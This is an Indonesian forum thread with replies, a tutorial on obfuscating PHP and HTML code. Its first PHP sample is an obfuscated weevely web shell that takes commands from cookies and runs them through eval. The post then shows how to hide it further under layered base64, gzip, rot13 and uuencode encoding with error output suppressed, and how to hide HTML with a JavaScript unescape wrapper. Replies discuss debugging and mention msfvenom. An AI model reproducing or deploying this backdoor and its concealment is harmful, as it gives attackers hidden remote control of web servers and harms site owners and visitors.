Cara Encode php (pemberi harapan palsu) :D
Misi om om yang ganteng ane mau share sesuatu, yang udah tau or paham jangan ditertawakan ya dan mohon koreksinya.
Sebelum di encode
Spoiler! :
PHP Code:
<?php
$eele
="rjzPSdpeic7jzZWNobyAnPjzCcuJjzGsuJz4nO2V2YWwoYmFzZTY0X2RlY29kZShwcmVjznX3JjzljzcGxhYjz2U";
$ljru="oYjzXJyYXjzkojzJjzy9bXjzlx3PVxzXS8nLCcvXHMvJyksIjzGFycmFjz5KCcnLCjzcrJyksjzIGpva";
$mgyi str_replace("rx","","rxsrxtrrx_rxrrxerxplrxarxce");
$qsbq="JjzGM9J2NvdW50JzskYjzTjz0kX0NPT0jztjzJRTtpZihyZXNldCgkYSk9jzPSdjzmYScgJiYgJGMoJGEpPjMpeyR";
$gfak="jzW4ojzYXJyYXlfc2jzxpjzY2UoJGEjzsJjzGMoJGjzEjzpLTMpKSkpKTtlY2jzhvjzICcjz8LyjzcuJGsuJz4nO30=";
$znkl $mgyi("oo""""oobaoosooe6oo4oo_oodooeoocodooe");
$jftg $mgyi("p","","pcrepaptep_pfpupnpcptpiopn");
$ialn $jftg(''$znkl($mgyi("jz"""$qsbq.$eele.$ljru.$gfak))); $ialn();
?>

setelah di encode
Spoiler! :
PHP Code:
<?php
@ini_set('output_buffering',0); 
@
ini_set('display_errors'0);
eval(
base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode("DdFXkoJAAADRf26BSE4KCJKHrMiQGXK4/yl2T9D1qqGsGaxlCfVdrpNLeas00phCawmagYrWOffourMqOVc1uZ2RKYwBGgftFb0GV79j0AiXOVl6gjQne7FUwcpI3eEgXRbt01cOzVyDrPuMl28OaJI/+Mkw+9GWevPKOgyikqMqlk6qEKoliNX18y1eFNs6q8nawUeD/PrFE/VSYvz2k81nbiysA22oNQqJwTH1SpIq3gPoci1n4s88H5zTDzsjea89JD3nFAVuqOqFEn9TVfTGkunnFaP22jFYcGEAh8ctBY+GQgP8qh/z5jA7uYvdotWs93V0PBq/SjRP4Fw4ufsmDmtr9ePtYpCbKgFvSy1RvSEwU/efxfTM6ILEG4j6lk945ai3USAKwhMJz7ttV7sIit/5U4zBHMhlHjw/rY3/1DRTghVC5vIcKVaijeZMafJN+9jZhoRrhhigD5wumbLDtsJ/e+Yy1mLvUryH9v420oPnCHFOedxpYoBsORYtbQhIqYn6J3yVcxfFu8TzLNi3DYPLQgGlAKqtjgztTk0JNdS5xY86GLMrcbfar74jMkUG9H6LhjycnW4gxyvlP/+/FQhtVRslFpVrnY1vNQtk3m3tmOb9BqCNt+qNCd7ongaywdfHBMZl8+jfujMOBqPhZMvj1sOiihGldtCvNmvYE9nhjnUzwPhLyXXvBN0Cwdtazws8rysdgjg3dAxqZZIao5KG9xGROqLcJbxkGxEGuJjm4GYZ5UVl1JuyzcThZ0ziilxMB/rQyhUGrwqp0ZjOEI0LBzwK0Q09qbXnn8g7s+Dhx5xv6IIoFwGdenSPnvQkKQ5LyHuCvdzH9RN/ocHhJBQnwbO4Y5P6w4ere2IX9gc=")))))));
?>

Ane menggunakan scriptnya weevely =))

Langsung saja ya tanpa basa-basi Big Grin
pertama siapkan pisang goreng ya :p eh file php-nya maksudnya Big Grin, udah disiapkan ya copy semua dong malah bengong. Ingat ya yang di copy cuma diantara <?php ?> (Paling atas sama bawah gak ikut). Noh liat ini biar gak bengong :p
Spoiler! :
[Image: asal.png]

[hide]ah pada bengong mau ngapain lagi :p ya buka tool encodenya dong yang gue dapatkan di kakak google Big Grin kalo belum punya nih copy disini aja http://fece.pusku.com/has.php Big Grin terus pastekan copy-an yang ke kotak yang atas tuh dan pilih type encode-nya. Nah kali ini saya pilih encode bsae64 – gzinflate – str_rot13 –convert_uu – gzinflate – base64 . Di ingetnya type encode-nya soalnya gue pelupa :p. Terus klik encode. Liat noh gambar :
Spoiler! :
[Image: encode.png]
Nah muncul angka ajaib kan dikotak yang bawah tu ? Kalo keluar ya udah copy aja semuanya kalo gak keluar mandi dulu sono :p
Lalu kita siapkan file dulu dan ketikkan :
Spoiler! :
PHP Code:
<?php
@
ini_set('display_errors'0);
eval(
base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode('hasil convert pastekan disini')))))));
?>

PHP Code:
Perintah ini berfungsi untuk meminimalkan buffering yang ada di file
PHP Code:
@ini_set('display_errors'0); 
Perintah ini bervungsi untuk menghilangkan error pada file

PHP Code:
eval(base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode('hasil convert pastekan disini'))))))); 
Perintah ini berfungsi untuk mendecode atau mengartikan perintah yang ke encode tadi
Udah pa belum lama amet sih (:|
Spoiler! :
[Image: edit.png]
Setelah itu save dengan extensi .php
kita coba dulu hasilnya Big Grin
Spoiler! :
[Image: weevely.png]

Sekarang html Big Grin
Pertama siapkan dulu filenya ya terus blok semuanya (Ctrl + A) terus copy (ctrl + c ).
Spoiler! :
[Image: siap.png]
Buka alamat ni Here terus pastekan script yang sudah dicopy tadi klik encode. Copykan hasil encodenya :
Spoiler! :
[Image: kopi.png]
siapkan file dulu, terus ketikkan :
Code:
<script type="text/javascript">document.write(unescape('hasil encode'));</script>
letakkan hasil encodenya di tulisan "hasil encode". Sehingga kayak gini. Surem saya ngantuk (:| (:| (:| (:| (:| (:| .
Spoiler! :
[Image: aduh.png]
[/hide]
Kita tes yuk :
[Image: sip1.png]
[Image: sip.png]

sip berhasil Smile
sekian dulu ya dari saya. Saya dah ngantuk mau molor =))

Mohon maaf kalo tutornya berantakan, saya buatnya dalam keadaan ngantuk (:| (:| (:| (:| .

Document : Download
Calon manusia sukses tidak akan pernah mengeluh, tapi akan sibuk memperbaiki diri dari semua kesalahan yang pernah dibuatnya
My Facebook
My Twitter

Wew Cip Cip KK makasi ilmuna :*
alpoah@IBTeam:~#

Power Off BODOH

ya ya boleh nih om , om paijul amntep deh
Quote:Call me Dillah , Okey ?

nice share,memang encoding php bs pakai weevely dan msfvenom untuk msfvenom sudah ane buat video tutorialnya di forum ini hehe

mas faizul, kok kenapa pas script phpnya di load malah ngeblank ?
Jika kamu tidak sanggup menanggung lelahnya belajar, maka kamu akan menanggung perihnya kebodohan (Imam Syafii)

(07-24-2013, 12:54 AM)dharaninja Wrote: mas faizul, kok kenapa pas script phpnya di load malah ngeblank ?

Mungkin ada salah koding punya ente ,, ato javascript ente g aktif ..
Nothing Impossible | Learn, Understand, Share | We Are Staff of Expert Zone Technology

(07-24-2013, 01:04 AM)ino_ot Wrote:
(07-24-2013, 12:54 AM)dharaninja Wrote: mas faizul, kok kenapa pas script phpnya di load malah ngeblank ?

javascript aktif mas.. kira-kira kalau ada salah, salah codingnya dimana ? kalau salah encode, kira kira salah dimananya ? tadi sebelum diencode php nya, scriptnya normal aja bisa diload..
Jika kamu tidak sanggup menanggung lelahnya belajar, maka kamu akan menanggung perihnya kebodohan (Imam Syafii)

(07-24-2013, 01:11 AM)dharaninja Wrote:
(07-24-2013, 01:04 AM)ino_ot Wrote:

javascript aktif mas.. kira-kira kalau ada salah, salah codingnya dimana ? kalau salah encode, kira kira salah dimananya ? tadi sebelum diencode php nya, scriptnya normal aja bisa diload..

coba script php ente masukin disini .. jika dari sini masih blank bisa dibilang script ente ada yang salah, jika dari sini tidak blank , maka pada saat pemanggilan decript nya salah ..

http://www.smartgb.com/free_encrypthtml.php
Nothing Impossible | Learn, Understand, Share | We Are Staff of Expert Zone Technology

up up up
gilar tiket aja gw ya..
Quote:~ Tan Hana Wighna Tan Sirna ~

(07-24-2013, 01:24 AM)gnome_selpa Wrote: up up up
gilar tiket aja gw ya..

Jangan tidur sampe sahur lu ya .. Jagain nie Trit =))Confused:-Confused:-Confused:-Confused:-Confused:-